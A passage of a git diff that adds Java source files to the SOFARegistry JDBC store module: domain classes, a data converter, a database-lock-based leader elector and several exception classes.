License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.convertor; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.jdbc.domain.ProvideDataDomain; +import java.util.Collections; +import java.util.List; +import java.util.stream.Collectors; +import org.springframework.util.CollectionUtils; + +/** + * @author xiaojian.xj + * @version $Id: ProvideDataDomainConvertor.java, v 0.1 2021年04月08日 17:49 xiaojian.xj Exp $ + */ +public class ProvideDataDomainConvertor { + + public static ProvideDataDomain convert2ProvideData( + PersistenceData persistenceData, String dataCenter) { + if (persistenceData == null) { + return null; + } + + return new ProvideDataDomain( + dataCenter, + PersistenceDataBuilder.getDataInfoId(persistenceData), + persistenceData.getData(), + persistenceData.getVersion()); + } + + public static PersistenceData convert2PersistenceData(ProvideDataDomain provideData) { + + if (provideData == null) { + return null; + } + + DataInfo dataInfo = DataInfo.valueOf(provideData.getDataKey()); + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setDataId(dataInfo.getDataId()); + persistenceData.setGroup(dataInfo.getGroup()); + persistenceData.setInstanceId(dataInfo.getInstanceId()); + persistenceData.setData(provideData.getDataValue()); + persistenceData.setVersion(provideData.getDataVersion()); + return persistenceData; + } + + public static List convert2PersistenceDatas( + List provideDataDomains) { + + if (CollectionUtils.isEmpty(provideDataDomains)) { + return Collections.emptyList(); + } + return provideDataDomains.stream() + .map(ProvideDataDomainConvertor::convert2PersistenceData) + .collect(Collectors.toList()); + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/AppRevisionDomain.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/AppRevisionDomain.java new file mode 100644 index 000000000..0f8cd012c --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/AppRevisionDomain.java @@ -0,0 +1,215 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.domain; + +import java.util.Date; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionDomain.java, v 0.1 2021年01月18日 17:51 xiaojian.xj Exp $ + */ +public class AppRevisionDomain { + + /** primary key */ + private long id; + + /** local data center */ + private String dataCenter; + + /** revision */ + private String revision; + + /** appName */ + private String appName; + + /** clientVersion */ + private String clientVersion; + + /** base_params */ + private String baseParams; + + /** service_params */ + private String serviceParams; + + /** create time */ + private Date gmtCreate; + + /** last update time */ + private Date gmtModify; + + /** + * Getter method for property id. + * + * @return property value of id + */ + public long getId() { + return id; + } + + /** + * Setter method for property id. + * + * @param id value to be assigned to property id + */ + public void setId(long id) { + this.id = id; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property revision. + * + * @return property value of revision + */ + public String getRevision() { + return revision; + } + + /** + * Setter method for property revision. + * + * @param revision value to be assigned to property revision + */ + public void setRevision(String revision) { + this.revision = revision; + } + + /** + * Getter method for property appName. + * + * @return property value of appName + */ + public String getAppName() { + return appName; + } + + /** + * Setter method for property appName. + * + * @param appName value to be assigned to property appName + */ + public void setAppName(String appName) { + this.appName = appName; + } + + /** + * Getter method for property baseParams. + * + * @return property value of baseParams + */ + public String getBaseParams() { + return baseParams; + } + + /** + * Setter method for property baseParams. + * + * @param baseParams value to be assigned to property baseParams + */ + public void setBaseParams(String baseParams) { + this.baseParams = baseParams; + } + + /** + * Getter method for property serviceParams. + * + * @return property value of serviceParams + */ + public String getServiceParams() { + return serviceParams; + } + + /** + * Setter method for property serviceParams. + * + * @param serviceParams value to be assigned to property serviceParams + */ + public void setServiceParams(String serviceParams) { + this.serviceParams = serviceParams; + } + + /** + * Getter method for property gmtCreate. + * + * @return property value of gmtCreate + */ + public Date getGmtCreate() { + return gmtCreate; + } + + /** + * Setter method for property gmtCreate. + * + * @param gmtCreate value to be assigned to property gmtCreate + */ + public void setGmtCreate(Date gmtCreate) { + this.gmtCreate = gmtCreate; + } + + /** + * Getter method for property gmtModify. + * + * @return property value of gmtModify + */ + public Date getGmtModify() { + return gmtModify; + } + + /** + * Setter method for property gmtModify. + * + * @param gmtModify value to be assigned to property gmtModify + */ + public void setGmtModify(Date gmtModify) { + this.gmtModify = gmtModify; + } + + /** + * Getter method for property clientVersion. + * + * @return property value of clientVersion + */ + public String getClientVersion() { + return clientVersion; + } + + /** + * Setter method for property clientVersion. + * + * @param clientVersion value to be assigned to property clientVersion + */ + public void setClientVersion(String clientVersion) { + this.clientVersion = clientVersion; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/DistributeLockDomain.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/DistributeLockDomain.java new file mode 100644 index 000000000..6e1af3146 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/DistributeLockDomain.java @@ -0,0 +1,231 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.domain; + +import java.util.Date; + +/** + * @author xiaojian.xj + * @version $Id: DistributeLockDomain.java, v 0.1 2021年03月12日 14:34 xiaojian.xj Exp $ + */ +public class DistributeLockDomain { + + /** primary key */ + private long id; + + /** local data center */ + private String dataCenter; + + /** lock name */ + private String lockName; + + /** lock owner */ + private String owner; + + /** duration(millisecond) */ + private long duration; + + /** create */ + private Date gmtCreate; + + /** last update timestamp */ + private Date gmtModified; + + /** current timestamp in db */ + private Date gmtDbServerTime; + + public DistributeLockDomain() {} + + public DistributeLockDomain(String dataCenter, String lockName, String owner, long duration) { + this.dataCenter = dataCenter; + this.lockName = lockName; + this.owner = owner; + this.duration = duration; + } + + /** + * Getter method for property id. + * + * @return property value of id + */ + public long getId() { + return id; + } + + /** + * Setter method for property id. + * + * @param id value to be assigned to property id + */ + public void setId(long id) { + this.id = id; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property lockName. + * + * @return property value of lockName + */ + public String getLockName() { + return lockName; + } + + /** + * Setter method for property lockName. + * + * @param lockName value to be assigned to property lockName + */ + public void setLockName(String lockName) { + this.lockName = lockName; + } + + /** + * Getter method for property owner. + * + * @return property value of owner + */ + public String getOwner() { + return owner; + } + + /** + * Setter method for property owner. + * + * @param owner value to be assigned to property owner + */ + public void setOwner(String owner) { + this.owner = owner; + } + + /** + * Getter method for property duration. + * + * @return property value of duration + */ + public long getDuration() { + return duration; + } + + /** + * Setter method for property duration. + * + * @param duration value to be assigned to property duration + */ + public void setDuration(long duration) { + this.duration = duration; + } + + /** + * Getter method for property gmtCreate. + * + * @return property value of gmtCreate + */ + public Date getGmtCreate() { + return gmtCreate; + } + + /** + * Setter method for property gmtCreate. + * + * @param gmtCreate value to be assigned to property gmtCreate + */ + public void setGmtCreate(Date gmtCreate) { + this.gmtCreate = gmtCreate; + } + + /** + * Getter method for property gmtModified. + * + * @return property value of gmtModified + */ + public Date getGmtModified() { + return gmtModified; + } + + /** + * Setter method for property gmtModified. + * + * @param gmtModified value to be assigned to property gmtModified + */ + public void setGmtModified(Date gmtModified) { + this.gmtModified = gmtModified; + } + + /** + * Getter method for property gmtDbServerTime. + * + * @return property value of gmtDbServerTime + */ + public Date getGmtDbServerTime() { + return gmtDbServerTime; + } + + /** + * Setter method for property gmtDbServerTime. + * + * @param gmtDbServerTime value to be assigned to property gmtDbServerTime + */ + public void setGmtDbServerTime(Date gmtDbServerTime) { + this.gmtDbServerTime = gmtDbServerTime; + } + + public boolean expire() { + + return gmtDbServerTime.getTime() > gmtModified.getTime() + duration; + } + + @Override + public String toString() { + return "DistributeLock{" + + "dataCenter='" + + dataCenter + + '\'' + + ", lockName='" + + lockName + + '\'' + + ", owner='" + + owner + + '\'' + + ", duration=" + + duration + + ", gmtCreate=" + + gmtCreate + + ", gmtModified=" + + gmtModified + + ", gmtDbServerTime=" + + gmtDbServerTime + + '}'; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/FollowCompeteLockDomain.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/FollowCompeteLockDomain.java new file mode 100644 index 000000000..7abe0465e --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/FollowCompeteLockDomain.java @@ -0,0 +1,142 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.domain; + +import java.util.Date; + +/** + * @author xiaojian.xj + * @version $Id: FollowCompeteLockDomain.java, v 0.1 2021年03月16日 11:39 xiaojian.xj Exp $ + */ +public class FollowCompeteLockDomain { + + /** local data center */ + private String dataCenter; + + /** lock name */ + private String lockName; + + /** lock owner */ + private String owner; + + /** last update timestamp */ + private Date gmtModified; + + /** try to compete new owner */ + private String newOwner; + + public FollowCompeteLockDomain() {} + + public FollowCompeteLockDomain( + String dataCenter, String lockName, String owner, Date gmtModified, String newOwner) { + this.dataCenter = dataCenter; + this.lockName = lockName; + this.owner = owner; + this.gmtModified = gmtModified; + this.newOwner = newOwner; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property lockName. + * + * @return property value of lockName + */ + public String getLockName() { + return lockName; + } + + /** + * Setter method for property lockName. + * + * @param lockName value to be assigned to property lockName + */ + public void setLockName(String lockName) { + this.lockName = lockName; + } + + /** + * Getter method for property owner. + * + * @return property value of owner + */ + public String getOwner() { + return owner; + } + + /** + * Setter method for property owner. + * + * @param owner value to be assigned to property owner + */ + public void setOwner(String owner) { + this.owner = owner; + } + + /** + * Getter method for property gmtModified. + * + * @return property value of gmtModified + */ + public Date getGmtModified() { + return gmtModified; + } + + /** + * Setter method for property gmtModified. + * + * @param gmtModified value to be assigned to property gmtModified + */ + public void setGmtModified(Date gmtModified) { + this.gmtModified = gmtModified; + } + + /** + * Getter method for property newOwner. + * + * @return property value of newOwner + */ + public String getNewOwner() { + return newOwner; + } + + /** + * Setter method for property newOwner. + * + * @param newOwner value to be assigned to property newOwner + */ + public void setNewOwner(String newOwner) { + this.newOwner = newOwner; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/InterfaceAppsIndexDomain.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/InterfaceAppsIndexDomain.java new file mode 100644 index 000000000..fd722233b --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/InterfaceAppsIndexDomain.java @@ -0,0 +1,200 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.domain; + +import com.alipay.sofa.registry.util.MessageDigests; +import java.sql.Timestamp; + +/** + * @author xiaojian.xj + * @version $Id: InterfaceAppsIndexDomain.java, v 0.1 2021年01月24日 17:05 xiaojian.xj Exp $ + */ +public class InterfaceAppsIndexDomain { + + /** primary key */ + private long id; + + /** local data center */ + private String dataCenter; + + /** interfaceName */ + private String interfaceName; + + /** appName */ + private String appName; + + /** reference */ + private boolean reference; + + /** hashcode */ + private String hashcode; + + /** create time */ + private Timestamp gmtCreate; + + /** last update time */ + private Timestamp gmtModify; + + public InterfaceAppsIndexDomain() {} + + public InterfaceAppsIndexDomain(String dataCenter, String interfaceName, String appName) { + this.dataCenter = dataCenter; + this.interfaceName = interfaceName; + this.appName = appName; + // uk: dataCenter + appName + 32char + this.hashcode = MessageDigests.getMd5String(interfaceName); + } + + /** + * Getter method for property id. + * + * @return property value of id + */ + public long getId() { + return id; + } + + /** + * Setter method for property id. + * + * @param id value to be assigned to property id + */ + public void setId(long id) { + this.id = id; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property interfaceName. + * + * @return property value of interfaceName + */ + public String getInterfaceName() { + return interfaceName; + } + + /** + * Setter method for property interfaceName. + * + * @param interfaceName value to be assigned to property interfaceName + */ + public void setInterfaceName(String interfaceName) { + this.interfaceName = interfaceName; + } + + /** + * Getter method for property appName. + * + * @return property value of appName + */ + public String getAppName() { + return appName; + } + + /** + * Setter method for property appName. + * + * @param appName value to be assigned to property appName + */ + public void setAppName(String appName) { + this.appName = appName; + } + + public boolean isReference() { + return reference; + } + + /** + * Setter method for property reference. + * + * @param reference value to be assigned to property reference + */ + public void setReference(boolean reference) { + this.reference = reference; + } + + /** + * Getter method for property gmtCreate. + * + * @return property value of gmtCreate + */ + public Timestamp getGmtCreate() { + return gmtCreate; + } + + /** + * Setter method for property gmtCreate. + * + * @param gmtCreate value to be assigned to property gmtCreate + */ + public void setGmtCreate(Timestamp gmtCreate) { + this.gmtCreate = gmtCreate; + } + + /** + * Getter method for property gmtModify. + * + * @return property value of gmtModify + */ + public Timestamp getGmtModify() { + return gmtModify; + } + + /** + * Setter method for property gmtModify. + * + * @param gmtModify value to be assigned to property gmtModify + */ + public void setGmtModify(Timestamp gmtModify) { + this.gmtModify = gmtModify; + } + + /** + * Getter method for property hashcode. + * + * @return property value of hashcode + */ + public String getHashcode() { + return hashcode; + } + + /** + * Setter method for property hashcode. + * + * @param hashcode value to be assigned to property hashcode + */ + public void setHashcode(String hashcode) { + this.hashcode = hashcode; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/ProvideDataDomain.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/ProvideDataDomain.java new file mode 100644 index 000000000..3070c86c9 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/domain/ProvideDataDomain.java @@ -0,0 +1,203 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.domain; + +import java.util.Date; + +/** + * @author xiaojian.xj + * @version $Id: ProvideDataDomain.java, v 0.1 2021年03月13日 19:29 xiaojian.xj Exp $ + */ +public class ProvideDataDomain { + + /** primary dataKey */ + private long id; + + /** local data center */ + private String dataCenter; + + /** data dataKey */ + private String dataKey; + + /** data dataValue */ + private String dataValue; + + /** create time */ + private Date gmtCreate; + + /** last update time */ + private Date gmtModified; + + /** data version */ + private long dataVersion; + + public ProvideDataDomain() {} + + public ProvideDataDomain(String dataCenter, String dataKey, String dataValue, long dataVersion) { + this.dataCenter = dataCenter; + this.dataKey = dataKey; + this.dataValue = dataValue; + this.dataVersion = dataVersion; + } + + /** + * Getter method for property id. + * + * @return property dataValue of id + */ + public long getId() { + return id; + } + + /** + * Setter method for property id. + * + * @param id dataValue to be assigned to property id + */ + public void setId(long id) { + this.id = id; + } + + /** + * Getter method for property dataCenter. + * + * @return property dataValue of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter dataValue to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property dataKey. + * + * @return property dataValue of dataKey + */ + public String getDataKey() { + return dataKey; + } + + /** + * Setter method for property dataKey. + * + * @param dataKey dataValue to be assigned to property dataKey + */ + public void setDataKey(String dataKey) { + this.dataKey = dataKey; + } + + /** + * Getter method for property dataValue. + * + * @return property dataValue of dataValue + */ + public String getDataValue() { + return dataValue; + } + + /** + * Setter method for property dataValue. + * + * @param dataValue dataValue to be assigned to property dataValue + */ + public void setDataValue(String dataValue) { + this.dataValue = dataValue; + } + + /** + * Getter method for property gmtCreate. + * + * @return property dataValue of gmtCreate + */ + public Date getGmtCreate() { + return gmtCreate; + } + + /** + * Setter method for property gmtCreate. + * + * @param gmtCreate dataValue to be assigned to property gmtCreate + */ + public void setGmtCreate(Date gmtCreate) { + this.gmtCreate = gmtCreate; + } + + /** + * Getter method for property gmtModified. + * + * @return property dataValue of gmtModified + */ + public Date getGmtModified() { + return gmtModified; + } + + /** + * Setter method for property gmtModified. + * + * @param gmtModified dataValue to be assigned to property gmtModified + */ + public void setGmtModified(Date gmtModified) { + this.gmtModified = gmtModified; + } + + /** + * Getter method for property dataVersion. + * + * @return property value of dataVersion + */ + public long getDataVersion() { + return dataVersion; + } + + /** + * Setter method for property dataVersion. + * + * @param dataVersion value to be assigned to property dataVersion + */ + public void setDataVersion(long dataVersion) { + this.dataVersion = dataVersion; + } + + @Override + public String toString() { + return "ProvideDataDomain{" + + "dataCenter='" + + dataCenter + + '\'' + + ", dataKey='" + + dataKey + + '\'' + + ", dataValue='" + + dataValue + + '\'' + + ", gmtCreate=" + + gmtCreate + + ", gmtModified=" + + gmtModified + + ", dataVersion=" + + dataVersion + + '}'; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/elector/MetaJdbcLeaderElector.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/elector/MetaJdbcLeaderElector.java new file mode 100644 index 000000000..25f053db8 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/elector/MetaJdbcLeaderElector.java @@ -0,0 +1,163 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.elector; + +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.config.MetaElectorConfig; +import com.alipay.sofa.registry.jdbc.domain.DistributeLockDomain; +import com.alipay.sofa.registry.jdbc.domain.FollowCompeteLockDomain; +import com.alipay.sofa.registry.jdbc.mapper.DistributeLockMapper; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.elector.AbstractLeaderElector; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: MetaJdbcLeaderElector.java, v 0.1 2021年03月12日 10:18 xiaojian.xj Exp $ + */ +public class MetaJdbcLeaderElector extends AbstractLeaderElector { + + private static final Logger LOG = + LoggerFactory.getLogger("META-ELECTOR", "[MetaJdbcLeaderElector]"); + + private static final String lockName = "META-MASTER"; + + @Autowired private DistributeLockMapper distributeLockMapper; + + @Autowired private MetaElectorConfig metaElectorConfig; + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + /** + * start elect, return current leader + * + * @return + */ + @Override + protected LeaderInfo doElect() { + DistributeLockDomain lock = + distributeLockMapper.queryDistLock(defaultCommonConfig.getClusterId(), lockName); + + /** compete and return leader */ + if (lock == null) { + return competeLeader(defaultCommonConfig.getClusterId()); + } + + ElectorRole role = amILeader(lock.getOwner()) ? ElectorRole.LEADER : ElectorRole.FOLLOWER; + if (role == ElectorRole.LEADER) { + lock = onLeaderWorking(lock, myself()); + } else { + lock = onFollowWorking(lock, myself()); + } + LeaderInfo result = leaderFrom(lock); + if (LOG.isInfoEnabled()) { + LOG.info("meta role : {}, leaderInfo: {}", role, result); + } + return result; + } + + /** + * compete and return leader + * + * @param dataCenter + * @return + */ + private LeaderInfo competeLeader(String dataCenter) { + DistributeLockDomain lock = + new DistributeLockDomain( + dataCenter, lockName, myself(), metaElectorConfig.getLockExpireDuration()); + try { + // throw exception if insert fail + distributeLockMapper.competeLockOnInsert(lock); + // compete finish. + lock = distributeLockMapper.queryDistLock(dataCenter, lockName); + + if (LOG.isInfoEnabled()) { + LOG.info("meta: {} compete success, become leader.", myself()); + } + } catch (Throwable t) { + // compete leader error, query current leader + lock = distributeLockMapper.queryDistLock(dataCenter, lockName); + if (LOG.isInfoEnabled()) { + LOG.info("meta: {} compete error, leader is: {}.", myself(), lock.getOwner()); + } + } + return leaderFrom(lock); + } + + static LeaderInfo leaderFrom(DistributeLockDomain lock) { + return calcLeaderInfo( + lock.getOwner(), + lock.getGmtModified().getTime(), + lock.getGmtModified(), + lock.getDuration()); + } + /** + * query current leader + * + * @return + */ + @Override + protected LeaderInfo doQuery() { + DistributeLockDomain lock = + distributeLockMapper.queryDistLock(defaultCommonConfig.getClusterId(), lockName); + if (lock == null) { + return LeaderInfo.HAS_NO_LEADER; + } + + return leaderFrom(lock); + } + + private DistributeLockDomain onLeaderWorking(DistributeLockDomain lock, String myself) { + + try { + /** as leader, do heartbeat */ + distributeLockMapper.ownerHeartbeat(lock); + if (LOG.isInfoEnabled()) { + LOG.info("leader heartbeat: {}", myself); + } + return distributeLockMapper.queryDistLock(lock.getDataCenter(), lock.getLockName()); + } catch (Throwable t) { + LOG.error("leader:{} heartbeat error.", myself, t); + } + return lock; + } + + public DistributeLockDomain onFollowWorking(DistributeLockDomain lock, String myself) { + /** as follow, do compete if lock expire */ + if (lock.expire()) { + if (LOG.isInfoEnabled()) { + LOG.info("lock expire: {}, meta elector start: {}", lock, myself); + } + distributeLockMapper.competeLockOnUpdate( + new FollowCompeteLockDomain( + lock.getDataCenter(), + lock.getLockName(), + lock.getOwner(), + lock.getGmtModified(), + myself)); + DistributeLockDomain newLock = + distributeLockMapper.queryDistLock(lock.getDataCenter(), lock.getLockName()); + if (LOG.isInfoEnabled()) { + LOG.info("elector finish, new lock: {}", lock); + } + return newLock; + } + return lock; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/AppRevisionQueryException.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/AppRevisionQueryException.java new file mode 100644 index 000000000..de43cc61c --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/AppRevisionQueryException.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.exception; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionQueryException.java, v 0.1 2021年02月03日 15:59 xiaojian.xj Exp $ + */ +public class AppRevisionQueryException extends RuntimeException { + + public AppRevisionQueryException(String revision, String msg) { + super(String.format("query revision: %s error, errorMsg: %s", revision, msg)); + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/InterfaceAppQueryException.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/InterfaceAppQueryException.java new file mode 100644 index 000000000..c260b61c1 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/InterfaceAppQueryException.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.exception; + +/** + * @author xiaojian.xj + * @version $Id: RevisionNotExistException.java, v 0.1 2021年02月03日 15:59 xiaojian.xj Exp $ + */ +public class InterfaceAppQueryException extends RuntimeException { + + public InterfaceAppQueryException(String service) { + super(String.format("query apps by service: %s error.", service)); + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/RevisionNotExistException.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/RevisionNotExistException.java new file mode 100644 index 000000000..395847294 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/exception/RevisionNotExistException.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.exception; + +/** + * @author xiaojian.xj + * @version $Id: RevisionNotExistException.java, v 0.1 2021年02月03日 15:59 xiaojian.xj Exp $ + */ +public class RevisionNotExistException extends RuntimeException { + + public RevisionNotExistException(String revision) { + super(String.format("revision: %s not exist.", revision)); + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/AppRevisionMapper.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/AppRevisionMapper.java new file mode 100644 index 000000000..63dad85a6 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/AppRevisionMapper.java @@ -0,0 +1,102 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT 